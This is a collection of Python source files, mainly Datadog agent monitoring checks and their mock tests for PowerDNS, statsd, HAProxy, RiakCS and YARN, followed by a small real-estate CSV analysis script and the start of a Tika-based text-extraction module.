# See https://doc.powerdns.com/md/recursor/stats/ for metrics explanation
GAUGE_METRICS = [
'cache-entries',
'concurrent-queries',
]
RATE_METRICS = [
'all-outqueries',
'answers-slow',
'answers0-1',
'answers1-10',
'answers10-100',
'answers100-1000',
'cache-hits',
'cache-misses',
'noerror-answers',
'outgoing-timeouts',
'questions',
'servfail-answers',
'tcp-outqueries',
'tcp-questions',
]
SERVICE_CHECK_NAME = 'powerdns.recursor.can_connect'
def check(self, instance):
config, tags = self._get_config(instance)
stats = self._get_pdns_stats(config)
for stat in stats:
if stat['name'] in PowerDNSRecursorCheck.GAUGE_METRICS:
self.gauge('powerdns.recursor.{}'.format(stat['name']), float(stat['value']), tags=tags)
elif stat['name'] in PowerDNSRecursorCheck.RATE_METRICS:
self.rate('powerdns.recursor.{}'.format(stat['name']), float(stat['value']), tags=tags)
def _get_config(self, instance):
required = ['host', 'port', 'api_key']
for param in required:
if not instance.get(param):
raise Exception("powerdns_recursor instance missing %s. Skipping." % (param))
host = instance.get('host')
port = int(instance.get('port'))
api_key = instance.get('api_key')
tags = instance.get('tags', [])
Config = namedtuple('Config', [
'host',
'port',
'api_key']
)
return Config(host, port, api_key), tags
def _get_pdns_stats(self, config):
url = "http://{}:{}/servers/localhost/statistics".format(config.host, config.port)
service_check_tags = ['recursor_host:{}'.format(config.host), 'recursor_port:{}'.format(config.port)]
headers = {"X-API-Key": config.api_key}
try:
request = requests.get(url, headers=headers)
request.raise_for_status()
except Exception:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
tags=service_check_tags)
raise
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK,
tags=service_check_tags)
return request.json()
```
#### File: dd-agent/checks.d/statsd.py
```python
import re
import socket
from StringIO import StringIO
# project
from checks import AgentCheck
SERVICE_CHECK_NAME = "statsd.can_connect"
SERVICE_CHECK_NAME_HEALTH = "statsd.is_up"
ENDER = re.compile("^(END|health: up|health: down)\n$", re.MULTILINE)
BAD_ENDER = re.compile("^ERROR\n$", re.MULTILINE)
class StatsCheck(AgentCheck):
def check(self, instance):
host = instance.get("host", "localhost")
port = instance.get("port", 8126)
tags = instance.get("tags", [])
tags = ["host:{0}".format(host), "port:{0}".format(port)] + tags
# Is it up?
health = self._send_command(host, port, "health", tags).getvalue().strip()
if health == "health: up":
self.service_check(
SERVICE_CHECK_NAME_HEALTH, AgentCheck.OK, tags
)
else:
self.service_check(
SERVICE_CHECK_NAME_HEALTH, AgentCheck.CRITICAL, tags
)
# Get general stats
stats = self._send_command(host, port, "stats", tags)
stats.seek(0)
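        # each line of the "stats" response is expected to look like
        # "metric_name: value" (e.g. "uptime: 365"); lines that do not split
        # into exactly two parts are ignored below.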
for l in stats.readlines():
parts = l.strip().split(":")
if len(parts) == 2:
# Uptime isn't a gauge. Since we have only one exception, this
# seems fine. If we make more a lookup table might be best.
if parts[0] == "bad_lines_seen":
self.monotonic_count("statsd.{0}".format(parts[0]), float(parts[1]), tags=tags)
else:
self.gauge("statsd.{0}".format(parts[0]), float(parts[1]), tags=tags)
counters = len(self._send_command(host, port, "counters", tags).getvalue().splitlines()) - 1
self.gauge("statsd.counters.count", counters, tags=tags)
gauges = len(self._send_command(host, port, "gauges", tags).getvalue().splitlines()) - 1
self.gauge("statsd.gauges.count", gauges, tags=tags)
timers = len(self._send_command(host, port, "timers", tags).getvalue().splitlines()) - 1
self.gauge("statsd.timers.count", timers, tags=tags)
# Send the final service check status
self.service_check(SERVICE_CHECK_NAME, AgentCheck.OK, tags)
def _send_command(self, host, port, command, tags):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall("{0}\n".format(command))
buf = StringIO()
chunk = s.recv(1024)
buf.write(chunk)
while chunk:
if ENDER.search(chunk):
break
if BAD_ENDER.search(chunk):
raise Exception("Got an error issuing command: {0}".format(command))
chunk = s.recv(1024)
buf.write(chunk)
return buf
except Exception as e:
self.service_check(
SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags
)
raise Exception("Failed connection {0}".format(str(e)))
finally:
s.close()
```
#### File: checks/mock/test_haproxy.py
```python
from collections import defaultdict
import copy
# 3p
import mock
# project
from tests.checks.common import AgentCheckTest
MOCK_DATA = """# pxname,svname,qcur,qmax,scur,smax,slim,stot,bin,bout,dreq,dresp,ereq,econ,eresp,wretr,wredis,status,weight,act,bck,chkfail,chkdown,lastchg,downtime,qlimit,pid,iid,sid,throttle,lbtot,tracked,type,rate,rate_lim,rate_max,check_status,check_code,check_duration,hrsp_1xx,hrsp_2xx,hrsp_3xx,hrsp_4xx,hrsp_5xx,hrsp_other,hanafail,req_rate,req_rate_max,req_tot,cli_abrt,srv_abrt,
a,FRONTEND,,,1,2,12,1,11,11,0,0,0,,,,,OPEN,,,,,,,,,1,1,0,,,,0,1,0,2,,,,0,1,0,0,0,0,,1,1,1,,,
a,BACKEND,0,0,0,0,12,0,11,11,0,0,,0,0,0,0,UP,0,0,0,,0,1221810,0,,1,1,0,,0,,1,0,,0,,,,0,0,0,0,0,0,,,,,0,0,
b,FRONTEND,,,1,2,12,11,11,0,0,0,0,,,,,OPEN,,,,,,,,,1,2,0,,,,0,0,0,1,,,,,,,,,,,0,0,0,,,
b,i-1,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP 1/2,1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-2,0,0,1,1,,1,1,0,,0,,0,0,0,0,UP 1/2,1,1,0,0,0,1,0,,1,3,2,,71,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-3,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-4,0,0,0,1,,1,1,0,,0,,0,0,0,0,DOWN,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-5,0,0,0,1,,1,1,0,,0,,0,0,0,0,MAINT,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,BACKEND,0,0,1,2,0,421,1,0,0,0,,0,0,0,0,UP,6,6,0,,0,1,0,,1,3,0,,421,,1,0,,1,,,,,,,,,,,,,,0,0,
c,i-1,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP,1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
c,i-2,0,0,0,1,,1,1,0,,0,,0,0,0,0,DOWN (agent),1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
c,i-3,0,0,0,1,,1,1,0,,0,,0,0,0,0,NO CHECK,1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
c,BACKEND,0,0,1,2,0,421,1,0,0,0,,0,0,0,0,UP,6,6,0,,0,1,0,,1,3,0,,421,,1,0,,1,,,,,,,,,,,,,,0,0,
"""
AGG_STATUSES_BY_SERVICE = (
(['status:available', 'service:a'], 1),
(['status:available', 'service:b'], 4),
(['status:unavailable', 'service:b'], 2),
(['status:available', 'service:c'], 1),
(['status:unavailable', 'service:c'], 2)
)
AGG_STATUSES = (
(['status:available'], 6),
(['status:unavailable'], 4)
)
class TestCheckHAProxy(AgentCheckTest):
CHECK_NAME = 'haproxy'
BASE_CONFIG = {
'init_config': None,
'instances': [
{
'url': 'http://localhost/admin?stats',
'collect_status_metrics': True,
}
]
}
def _assert_agg_statuses(self, count_status_by_service=True, collate_status_tags_per_host=False):
expected_statuses = AGG_STATUSES_BY_SERVICE if count_status_by_service else AGG_STATUSES
for tags, value in expected_statuses:
if collate_status_tags_per_host:
# Assert that no aggregate statuses are sent
self.assertMetric('haproxy.count_per_status', tags=tags, count=0)
else:
self.assertMetric('haproxy.count_per_status', value=value, tags=tags)
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_agg_only(self, mock_requests):
config = copy.deepcopy(self.BASE_CONFIG)
# with count_status_by_service set to False
config['instances'][0]['count_status_by_service'] = False
self.run_check(config)
self.assertMetric('haproxy.count_per_status', value=2, tags=['status:open'])
self.assertMetric('haproxy.count_per_status', value=4, tags=['status:up'])
self.assertMetric('haproxy.count_per_status', value=2, tags=['status:down'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:maint'])
self.assertMetric('haproxy.count_per_status', value=0, tags=['status:nolb'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:no_check'])
self._assert_agg_statuses(count_status_by_service=False)
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_by_service(self, mock_requests):
self.run_check(self.BASE_CONFIG)
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:open', 'service:a'])
self.assertMetric('haproxy.count_per_status', value=3, tags=['status:up', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:open', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:down', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:maint', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:up', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:down', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:no_check', 'service:c'])
self._assert_agg_statuses()
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_by_service_and_host(self, mock_requests):
config = copy.deepcopy(self.BASE_CONFIG)
config['instances'][0]['collect_status_metrics_by_host'] = True
self.run_check(config)
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:FRONTEND', 'status:open', 'service:a'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:FRONTEND', 'status:open', 'service:b'])
for backend in ['i-1', 'i-2', 'i-3']:
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:%s' % backend, 'status:up', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-4', 'status:down', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-5', 'status:maint', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-1', 'status:up', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-2', 'status:down', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-3', 'status:no_check', 'service:c'])
self._assert_agg_statuses()
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_by_service_and_collate_per_host(self, mock_requests):
config = copy.deepcopy(self.BASE_CONFIG)
config['instances'][0]['collect_status_metrics_by_host'] = True
config['instances'][0]['collate_status_tags_per_host'] = True
self.run_check(config)
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:FRONTEND', 'status:available', 'service:a'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:FRONTEND', 'status:available', 'service:b'])
for backend in ['i-1', 'i-2', 'i-3']:
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:%s' % backend, 'status:available', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-4', 'status:unavailable', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-5', 'status:unavailable', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-1', 'status:available', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-2', 'status:unavailable', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-3', 'status:unavailable', 'service:c'])
self._assert_agg_statuses(collate_status_tags_per_host=True)
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_collate_per_host(self, mock_requests):
config = copy.deepcopy(self.BASE_CONFIG)
config['instances'][0]['collect_status_metrics_by_host'] = True
config['instances'][0]['collate_status_tags_per_host'] = True
config['instances'][0]['count_status_by_service'] = False
self.run_check(config)
self.assertMetric('haproxy.count_per_status', value=2, tags=['backend:FRONTEND', 'status:available'])
self.assertMetric('haproxy.count_per_status', value=2, tags=['backend:i-1', 'status:available'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-2', 'status:available'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-2', 'status:unavailable'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-3', 'status:available'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-3', 'status:unavailable'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-4', 'status:unavailable'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-5', 'status:unavailable'])
self._assert_agg_statuses(count_status_by_service=False, collate_status_tags_per_host=True)
# This mock is only useful to make the first `run_check` run w/o errors (which in turn is useful only to initialize the check)
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_hosts_statuses(self, mock_requests):
self.run_check(self.BASE_CONFIG)
data = """# pxname,svname,qcur,qmax,scur,smax,slim,stot,bin,bout,dreq,dresp,ereq,econ,eresp,wretr,wredis,status,weight,act,bck,chkfail,chkdown,lastchg,downtime,qlimit,pid,iid,sid,throttle,lbtot,tracked,type,rate,rate_lim,rate_max,check_status,check_code,check_duration,hrsp_1xx,hrsp_2xx,hrsp_3xx,hrsp_4xx,hrsp_5xx,hrsp_other,hanafail,req_rate,req_rate_max,req_tot,cli_abrt,srv_abrt,
a,FRONTEND,,,1,2,12,1,11,11,0,0,0,,,,,OPEN,,,,,,,,,1,1,0,,,,0,1,0,2,,,,0,1,0,0,0,0,,1,1,1,,,
a,BACKEND,0,0,0,0,12,0,11,11,0,0,,0,0,0,0,UP,0,0,0,,0,1221810,0,,1,1,0,,0,,1,0,,0,,,,0,0,0,0,0,0,,,,,0,0,
b,FRONTEND,,,1,2,12,11,11,0,0,0,0,,,,,OPEN,,,,,,,,,1,2,0,,,,0,0,0,1,,,,,,,,,,,0,0,0,,,
b,i-1,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP 1/2,1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-2,0,0,1,1,,1,1,0,,0,,0,0,0,0,UP 1/2,1,1,0,0,0,1,0,,1,3,2,,71,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-3,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-4,0,0,0,1,,1,1,0,,0,,0,0,0,0,DOWN,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-5,0,0,0,1,,1,1,0,,0,,0,0,0,0,MAINT,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,BACKEND,0,0,1,2,0,421,1,0,0,0,,0,0,0,0,UP,6,6,0,,0,1,0,,1,3,0,,421,,1,0,,1,,,,,,,,,,,,,,0,0,
""".split('\n')
# per service
self.check._process_data(data, True, False, collect_status_metrics=True,
collect_status_metrics_by_host=False)
expected_hosts_statuses = defaultdict(int)
expected_hosts_statuses[('b', 'open')] = 1
expected_hosts_statuses[('b', 'up')] = 3
expected_hosts_statuses[('b', 'down')] = 1
expected_hosts_statuses[('b', 'maint')] = 1
expected_hosts_statuses[('a', 'open')] = 1
self.assertEquals(self.check.hosts_statuses, expected_hosts_statuses)
# backend hosts
agg_statuses = self.check._process_backend_hosts_metric(expected_hosts_statuses)
expected_agg_statuses = {
'a': {'available': 0, 'unavailable': 0},
'b': {'available': 3, 'unavailable': 2},
}
self.assertEquals(expected_agg_statuses, dict(agg_statuses))
# with process_events set to True
self.check._process_data(data, True, True, collect_status_metrics=True,
collect_status_metrics_by_host=False)
self.assertEquals(self.check.hosts_statuses, expected_hosts_statuses)
# per host
self.check._process_data(data, True, False, collect_status_metrics=True,
collect_status_metrics_by_host=True)
expected_hosts_statuses = defaultdict(int)
expected_hosts_statuses[('b', 'FRONTEND', 'open')] = 1
expected_hosts_statuses[('a', 'FRONTEND', 'open')] = 1
expected_hosts_statuses[('b', 'i-1', 'up')] = 1
expected_hosts_statuses[('b', 'i-2', 'up')] = 1
expected_hosts_statuses[('b', 'i-3', 'up')] = 1
expected_hosts_statuses[('b', 'i-4', 'down')] = 1
expected_hosts_statuses[('b', 'i-5', 'maint')] = 1
self.assertEquals(self.check.hosts_statuses, expected_hosts_statuses)
self.check._process_data(data, True, True, collect_status_metrics=True,
collect_status_metrics_by_host=True)
self.assertEquals(self.check.hosts_statuses, expected_hosts_statuses)
```
#### File: checks/mock/test_riakcs.py
```python
from socket import error
import unittest
# 3p
from mock import Mock
# project
from checks import AgentCheck
from tests.checks.common import AgentCheckTest, Fixtures, load_check
class RiakCSTest(AgentCheckTest):
CHECK_NAME = "riakcs"
def __init__(self, *args, **kwargs):
unittest.TestCase.__init__(self, *args, **kwargs)
self.config = {"instances": [{
"access_id":"foo",
"access_secret": "bar"}]}
self.check = load_check(self.CHECK_NAME, self.config, {})
self.check._connect = Mock(return_value=(None, None, ["aggregation_key:localhost:8080"]))
self.check._get_stats = Mock(return_value=self.check.load_json(
Fixtures.read_file('riakcs_in.json')))
def test_parser(self):
input_json = Fixtures.read_file('riakcs_in.json')
output_python = Fixtures.read_file('riakcs_out.python')
self.assertEquals(self.check.load_json(input_json), eval(output_python))
def test_metrics(self):
self.run_check(self.config)
expected = eval(Fixtures.read_file('riakcs_metrics.python'))
for m in expected:
self.assertMetric(m[0], m[2], m[3].get('tags', []))
def test_service_checks(self):
self.check = load_check(self.CHECK_NAME, self.config, {})
self.assertRaises(error, lambda: self.run_check(self.config))
self.assertEqual(len(self.service_checks), 1, self.service_checks)
self.assertServiceCheck(self.check.SERVICE_CHECK_NAME,
status=AgentCheck.CRITICAL,
tags=['aggregation_key:localhost:8080'])
```
#### File: checks/mock/test_yarn.py
```python
from urlparse import urljoin
# 3rd party
import mock
import json
from tests.checks.common import AgentCheckTest, Fixtures
# IDs
CLUSTER_NAME = 'SparkCluster'
# Resource manager URI
RM_ADDRESS = 'http://localhost:8088'
# Service URLs
YARN_CLUSTER_METRICS_URL = urljoin(RM_ADDRESS, '/ws/v1/cluster/metrics')
YARN_APPS_URL = urljoin(RM_ADDRESS, '/ws/v1/cluster/apps') + '?states=RUNNING'
YARN_NODES_URL = urljoin(RM_ADDRESS, '/ws/v1/cluster/nodes')
def requests_get_mock(*args, **kwargs):
class MockResponse:
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
if args[0] == YARN_CLUSTER_METRICS_URL:
with open(Fixtures.file('cluster_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif args[0] == YARN_APPS_URL:
with open(Fixtures.file('apps_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif args[0] == YARN_NODES_URL:
with open(Fixtures.file('nodes_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
class YARNCheck(AgentCheckTest):
CHECK_NAME = 'yarn'
YARN_CONFIG = {
'resourcemanager_uri': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME
}
YARN_CLUSTER_METRICS_VALUES = {
'yarn.metrics.apps_submitted': 0,
'yarn.metrics.apps_completed': 0,
'yarn.metrics.apps_pending': 0,
'yarn.metrics.apps_running': 0,
'yarn.metrics.apps_failed': 0,
'yarn.metrics.apps_killed': 0,
'yarn.metrics.reserved_mb': 0,
'yarn.metrics.available_mb': 17408,
'yarn.metrics.allocated_mb': 0,
'yarn.metrics.total_mb': 17408,
'yarn.metrics.reserved_virtual_cores': 0,
'yarn.metrics.available_virtual_cores': 7,
'yarn.metrics.allocated_virtual_cores': 1,
'yarn.metrics.total_virtual_cores': 8,
'yarn.metrics.containers_allocated': 0,
'yarn.metrics.containers_reserved': 0,
'yarn.metrics.containers_pending': 0,
'yarn.metrics.total_nodes': 1,
'yarn.metrics.active_nodes': 1,
'yarn.metrics.lost_nodes': 0,
'yarn.metrics.unhealthy_nodes': 0,
'yarn.metrics.decommissioned_nodes': 0,
'yarn.metrics.rebooted_nodes': 0,
}
YARN_CLUSTER_METRICS_TAGS = ['cluster_name:%s' % CLUSTER_NAME]
YARN_APP_METRICS_VALUES = {
'yarn.apps.progress': 100,
'yarn.apps.started_time': 1326815573334,
'yarn.apps.finished_time': 1326815598530,
'yarn.apps.elapsed_time': 25196,
'yarn.apps.allocated_mb': 0,
'yarn.apps.allocated_vcores': 0,
'yarn.apps.running_containers': 0,
'yarn.apps.memory_seconds': 151730,
'yarn.apps.vcore_seconds': 103,
}
YARN_APP_METRICS_TAGS = [
'cluster_name:%s' % CLUSTER_NAME,
'app_name:word count'
]
YARN_NODE_METRICS_VALUES = {
'yarn.node.last_health_update': 1324056895432,
'yarn.node.used_memory_mb': 0,
'yarn.node.avail_memory_mb': 8192,
'yarn.node.used_virtual_cores': 0,
'yarn.node.available_virtual_cores': 8,
'yarn.node.num_containers': 0,
}
YARN_NODE_METRICS_TAGS = [
'cluster_name:%s' % CLUSTER_NAME,
'node_id:h2:1235'
]
@mock.patch('requests.get', side_effect=requests_get_mock)
def test_check(self, mock_requests):
config = {
'instances': [self.YARN_CONFIG]
}
self.run_check(config)
# Check the YARN Cluster Metrics
for metric, value in self.YARN_CLUSTER_METRICS_VALUES.iteritems():
self.assertMetric(metric,
value=value,
tags=self.YARN_CLUSTER_METRICS_TAGS)
# Check the YARN App Metrics
for metric, value in self.YARN_APP_METRICS_VALUES.iteritems():
self.assertMetric(metric,
value=value,
tags=self.YARN_APP_METRICS_TAGS)
# Check the YARN Node Metrics
for metric, value in self.YARN_NODE_METRICS_VALUES.iteritems():
self.assertMetric(metric,
value=value,
tags=self.YARN_NODE_METRICS_TAGS)
``` |
{
"source": "joewill/PythonTenApps",
"score": 4
} |
#### File: PythonTenApps/9_real_estate_app/program.py
```python
import os
import csv
import statistics
from data_types import Purchase
def main():
print_header()
filename = get_data_file()
print(filename)
data = load_file(filename)
query_data(data)
def print_header():
print('-----------------------------------')
    print(' REAL ESTATE DATA MINING APP ')
print('-----------------------------------')
print()
def get_data_file():
base_folder = os.path.dirname(__file__)
return os.path.join(base_folder, 'data', 'SacramentoRealEstateTransactions2008.csv')
def load_file(filename):
with open(filename, 'r', encoding='utf-8') as fin:
reader = csv.DictReader(fin)
purchases = []
for row in reader:
p = Purchase.create_from_dict(row)
purchases.append(p)
return purchases
def query_data(data):
data.sort(key=lambda p: p.price)
high_purchase = data[-1]
print("The most expensive house is ${:,} with {} beds and {} baths.".format(
high_purchase.price, high_purchase.beds, high_purchase.baths))
low_purchase = data[0]
print("The least expensive house is ${:,} with {} beds and {} baths.".format(
low_purchase.price, low_purchase.beds, low_purchase.baths))
prices = [
        p.price # projection or items
for p in data # the set to process
]
avg_price = statistics.mean(prices)
print("The average home price is ${:,}".format(int(avg_price)))
two_bed_homes = [
        p # projection or items
for p in data # the set to process
if p.beds == 2 # test / condition
]
avg_price = statistics.mean([p.price for p in two_bed_homes])
avg_baths = statistics.mean([p.baths for p in two_bed_homes])
avg_sqft = statistics.mean([p.sq__ft for p in two_bed_homes])
print("Average two bedroom home is ${:,}, baths={}, sq ft={:,}".format(
int(avg_price), round(avg_baths, 1), round(avg_sqft, 1)))
if __name__ == '__main__':
main()
``` |
{
"source": "joewittmer/Morserino-32-Firmware-Updater",
"score": 3
} |
#### File: Morserino-32-Firmware-Updater/src/erase_firmware_message_parser.py
```python
import sys
import threading
from show_timed_progress import show_timed_progress
class EraseFirmwareMessageParser(object):
result = False
def __init__(self, callback, stdout):
self.read_percentage_complete = False
self.stdout = stdout
self.hault = False
self.callback = callback
self.t = threading.Thread(
target=show_timed_progress, args=(20, self.__callback, lambda: self.hault),
)
def __callback(self, d: int):
save_stdout = sys.stdout
sys.stdout = self.stdout
self.callback(d)
sys.stdout = save_stdout
def parse(self, s):
if "Erasing flash" in s:
self.t.start()
elif "Chip erase completed successfully" in s:
self.result = True
self.hault = True
self.t.join()
```
#### File: Morserino-32-Firmware-Updater/src/morserino.py
```python
import os
import sys
import esptool
from custom_exception import CustomException
from erase_firmware_message_parser import EraseFirmwareMessageParser
from get_resource_path import get_resource_path
from image_info_validation_parser import ImageInfoValidationParser
from soc_info import SocInfo
from soc_info_message_parser import SocInfoMessageParser
from stdout_parser import StdoutParser
from update_firmware_message_parser import UpdateFirmwareMessageParser
class Morserino(object):
def __init__(self, port, baud, path):
self.update_command = self.__get_update_command(port, baud, path)
self.erase_command = self.__get_erase_command(port, baud)
self.info_command = self.__get_info_command(port, baud)
self.image_info_command = self.__get_image_info_command(port, baud, path)
def __get_update_command(self, port, baud, path):
otadata = get_resource_path("bin/boot_app0.bin")
bootloader = get_resource_path("bin/bootloader_qio_80m.bin")
app = path
partitionTable = get_resource_path("bin/morse_3_v3.0.ino.partitions.bin")
return [
"--chip",
"esp32",
"--port",
port,
"--baud",
baud,
"--before",
"default_reset",
"--after",
"hard_reset",
"write_flash",
"-z",
"--flash_mode",
"dio",
"--flash_freq",
"80m",
"0xe000",
otadata,
"0x1000",
bootloader,
"0x10000",
app,
"0x8000",
partitionTable,
]
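    # For reference, the argument list above corresponds roughly to this
    # esptool invocation (port, baud and firmware path are placeholders):
    #
    #   esptool.py --chip esp32 --port /dev/ttyUSB0 --baud 921600 \
    #       --before default_reset --after hard_reset write_flash -z \
    #       --flash_mode dio --flash_freq 80m \
    #       0xe000 boot_app0.bin 0x1000 bootloader_qio_80m.bin \
    #       0x10000 <firmware>.bin 0x8000 morse_3_v3.0.ino.partitions.bin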
def __get_erase_command(self, port, baud):
return [
"--chip",
"esp32",
"--port",
port,
"--baud",
baud,
"--before",
"default_reset",
"--after",
"hard_reset",
"erase_flash",
]
def __get_info_command(self, port, baud):
return [
"--chip",
"esp32",
"--port",
port,
"--baud",
baud,
"flash_id",
]
def __get_image_info_command(self, port, baud, path):
return ["--chip", "esp32", "--port", port, "--baud", baud, "image_info", path]
def validate_baud(self, baud, callback):
bauds = ["115200", "460800", "921600"]
if baud not in bauds:
raise CustomException(
"Invalid baud rate.%s%sPlease use a baud rate: 115200, 460800, or 921600."
% (os.linesep, os.linesep)
)
callback()
def validate_firmware(self, path, callback):
if not os.path.exists(path):
raise CustomException(
"Unable to open the file at %s%s%sPlease check the firmware file location and try again."
% (path, os.linesep, os.linesep)
)
imageInfoValidationParser = ImageInfoValidationParser()
save_stdout = sys.stdout
sys.stdout = StdoutParser(imageInfoValidationParser.parse)
try:
esptool.main(self.image_info_command)
except Exception as ex:
raise ex
finally:
sys.stdout = save_stdout
if imageInfoValidationParser.result:
callback()
else:
raise CustomException(
"Unable to verify the firmware file at %s%s%sPlease download the firmware file again and retry."
% (path, os.linesep, os.linesep)
)
def update_md5_checksum_table_with_single_checksum(self, checksum):
self.md5_checksum_table.append(str(checksum))
def check_firmware_against_known_md5_checksums(
self, path, show_md5, show_verification_passed
):
return self.__validate_md5_checksum(path, show_md5, show_verification_passed)
def get_info(self, callback=lambda: SocInfo()):
def bad_port_exception():
raise CustomException(
"Error connecting to morserino.%s%sPlease check the port is correct."
% (os.linesep, os.linesep)
)
socInfo = SocInfo()
socInfoMessageParser = SocInfoMessageParser(socInfo)
save_stdout = sys.stdout
sys.stdout = StdoutParser(socInfoMessageParser.parse)
try:
esptool.main(self.info_command)
except Exception:
raise bad_port_exception()
finally:
sys.stdout = save_stdout
if socInfoMessageParser.result:
callback(socInfo)
else:
raise bad_port_exception()
def erase(self, callback):
stdout = sys.stdout
eraseFirmwareParser = EraseFirmwareMessageParser(callback, stdout)
process_stdout = StdoutParser(eraseFirmwareParser.parse)
try:
sys.stdout = process_stdout
esptool.main(self.erase_command)
except Exception as ex:
raise ex
finally:
sys.stdout = stdout
if not eraseFirmwareParser.result:
raise CustomException(
"Error erasing morserino.%s%sPlease ask for assistance"
% (os.linesep, os.linesep)
)
def update(self, callback):
stdout = sys.stdout
updateFirmwareParser = UpdateFirmwareMessageParser(callback, sys.stdout)
process_stdout = StdoutParser(updateFirmwareParser.parse)
try:
sys.stdout = process_stdout
esptool.main(self.update_command)
except Exception as ex:
raise ex
finally:
sys.stdout = stdout
if not updateFirmwareParser.result:
raise CustomException(
"Error updating morserino.%s%sPlease ask for assistance"
% (os.linesep, os.linesep)
)
```
#### File: Morserino-32-Firmware-Updater/src/soc_info.py
```python
class SocInfo(object):
soc = ""
features = ""
mac = ""
crystal = ""
flash_size = ""
def __init__(self):
pass
``` |
{
"source": "joewiz/doc_processing_toolkit",
"score": 3
} |
#### File: doc_processing_toolkit/textextraction/extractors.py
```python
import glob
import logging
import os
import re
import shutil
import subprocess
import tempfile
from boto.s3.key import Key
from boto.s3.connection import S3Connection
"""
The functions below are minimal Python wrappers around Ghostscript, Tika, and
Tesseract. They are intended to simplify converting pdf files into usable text.
"""
class TextExtraction:
""" The TextExtraction class contains functions for extracting and saving
metadata and text from all files compatible with Apache Tika"""
def __init__(self, doc_path, tika_port=9998, host='localhost'):
self.doc_path = doc_path
self.root, self.extension = os.path.splitext(doc_path)
self.tika_port = tika_port
self.text_args = ['curl', '-T', doc_path,
'http://%s:%s/tika' % (host, tika_port),
'-s', '--header', 'Accept: text/plain']
self.metadata_args = ['curl', '-T', doc_path,
'http://%s:%s/meta' % (host, tika_port),
'-s', '--header', 'Accept: application/json']
def save(self, document, ext):
""" Save document to root location """
export_path = self.root + ext
with open(export_path, 'w') as f:
f.write(document)
def doc_to_text(self):
""" Converts a document to text using the Tika server """
